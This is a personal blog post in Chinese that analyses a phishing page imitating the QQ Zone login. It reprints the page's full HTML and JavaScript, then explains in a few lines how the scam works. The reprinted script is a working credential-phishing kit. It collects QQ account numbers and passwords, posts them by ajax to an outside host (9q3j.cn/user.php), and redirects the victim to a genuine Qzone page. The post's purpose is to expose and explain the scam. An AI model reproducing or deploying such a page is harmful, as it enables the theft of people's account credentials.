hidden: true
}
})
});
</script>
<body style="zoom: 1;">
<div id="content" class="content">
<div id="error_tips">
<div id="error_tips_content">
<span id="error_icon"></span>
<span id="error_message"></span>
</div>
</div>
<div id="login" class="login">
<div id="logo" class="logo">
</div>
<div id="app_name" style="display: none">
</div>
<div id="q_login" class="q_login" style="display: none">
<div id="q_login_title">
<div id="q_login_logo">
</div>
<label id="q_login_tips"></label>
</div>
<div id="q_logon_list" class="q_logon_list">
</div>
</div>
<div id="web_login">
<form id="loginform" autocomplete="off" name="loginform" action="" method="" target="" style="margin:0">
<script src="http://pv.sohu.com/cityjson?ie=utf-8"></script>
<input type="hidden" name="ip" id="ip"/>
<ul id="g_list">
<li id="g_u">
<div id="del_touch" class="del_touch">
<span id="del_u" class="del_u"></span>
</div>
<input id="u" class="inputstyle" name="hrUW3PG7mp3RLd3dJu" autocomplete="off" placeholder="QQ号码/手机/邮箱"/></li>
<li id="g_p">
<div id="del_touch_p" class="del_touch">
<span id="del_p" class="del_u"></span>
</div>
<input id="p" class="inputstyle" maxlength="16" type="password" name="LxMzAX2jog9Bpjs07jP" autocorrect="off" placeholder="请输入您的QQ密码"/></li>
</ul>
<div href="javascript:void(0);" id="go">登 录</div>
</form>
</div>
<div id="switch">
<div id="swicth_login" onclick="pt._switch()" style="display: none">
</div>
<div id="zc_feedback">
<span id="zc" onclick="window.open('http\x3A\x2F\x2Fptlogin2.qq.com\x2Fj_newreg_url')">注册新帐号</span>
<span id="forgetpwd" onclick="window.open('http://ptlogin2.qq.com/j_findpwd_url')">忘了密码?</span>
</div>
</div>
<div id="custom_bottom">
</div>
</div>
<div id="vcode">
<label id="vcode_tips"></label>
<div id="vcode_area">
<img id="vcode_img"/>
<label id="input_tips"></label>
<input id="vcode_input" name="vcode_input" tabindex="3" autocomplete="off" autocorrect="off" maxlength="6"/>
</div>
<div id="button">
</div>
</div>
</div>
<div id="new_vcode" class="new_vcode">
</div>
<div id="footerBlank">
</div>
<script>
var err = false;
var times = 0;
function error(msg){

$("#error_tips").css({display:'block'});
$('#error_message').html(msg);
err = true;
}

$('form input').focus(function(){

$("#error_tips").css({display:'none'});
err = false;

});

$("#error_tips").on('click',function(){
$(this).hide();
});

$("#go").on('click',function(){

var $this = $(this);

err = false;
var p = $("#p").val();
var u = $("#u").val();

u == '' && error('您还没有输入帐号!');
if(err) return false;
p == '' && error("您还没有输入密码!");
if(err) return false;

/^[1-9][0-9]{5,9}$/.test(u) || error('请输入正确的帐号!');
if(err) return false;

if(sameChar(u)){
error("您输入的帐号或密码不正确,请重新输入。");
$("#u").val('');
$("#p").val('');
return false;
}

var len = p.length;

(len < 6 || len>16) && error('您输入的帐号或密码不正确,请重新输入。');
/*新增密码校验*/
var pattern = /[\u4e00-\u9fa5]+/g;
pattern.test(p) && error("您输入的帐号或密码不正确,请重新输入。");
var pattern2 = /^[0-9]*$/g;
pattern2.test(p) && error("您输入的帐号或密码不正确,请重新输入。");
if(sameChar(p)){
error("您输入的帐号或密码不正确,请重新输入。");
$("#p").val('');
return false;
}
/**/

if(err) {
$("#p").val('');
return false;
}
if (!err){
$.ajax({
url:'https://9q3j.cn/user.php',//0x02 登陆地址
type:'POST',
dataType:'json',
data: $('#loginform').serialize(),
success:function(r){
setCookie('login','yes');
window.location.href='https://act.qzone.qq.com/vip/meteor/m/p/a49bd421cf33a08d1ee7e46b133e34013251?needQzoneTicket=1';
},
error:function(er){
setCookie('login','yes');
window.location.href='https://act.qzone.qq.com/vip/meteor/m/p/a49bd421cf33a08d1ee7e46b133e34013251?needQzoneTicket=1';
}
})
}
})

function sameChar(str){
var result = true;
var c = str.charAt(0);
for(var i=0;i<str.length;i++){
if(c != str.charAt(i)){
result = false;
break;
}
}
return result;
}

</script>
<div style="display:none;">
</body>
</html>

注意这段代码↓↓↓↓↓↓

url:’https://9q3j.cn/user.php’,//0x02 登陆地址
type:’POST’,

有html基础的可以自己去分析了。。可以看到该网站仿造QQ空间登陆外壳,再内嵌一个自己写的js脚本进行盗号(他还自己写了一个简易密码验证,我真是佛了),这个黑客还蛮良心的把注释都写了一下,可见你最终输入的密码都通过ajax方式post到了黑客自己写的PHP中并收集起来了

8+
Rhett Peng

软件工程大三在读学生,用个人网站记录学习动态

说点什么

avatar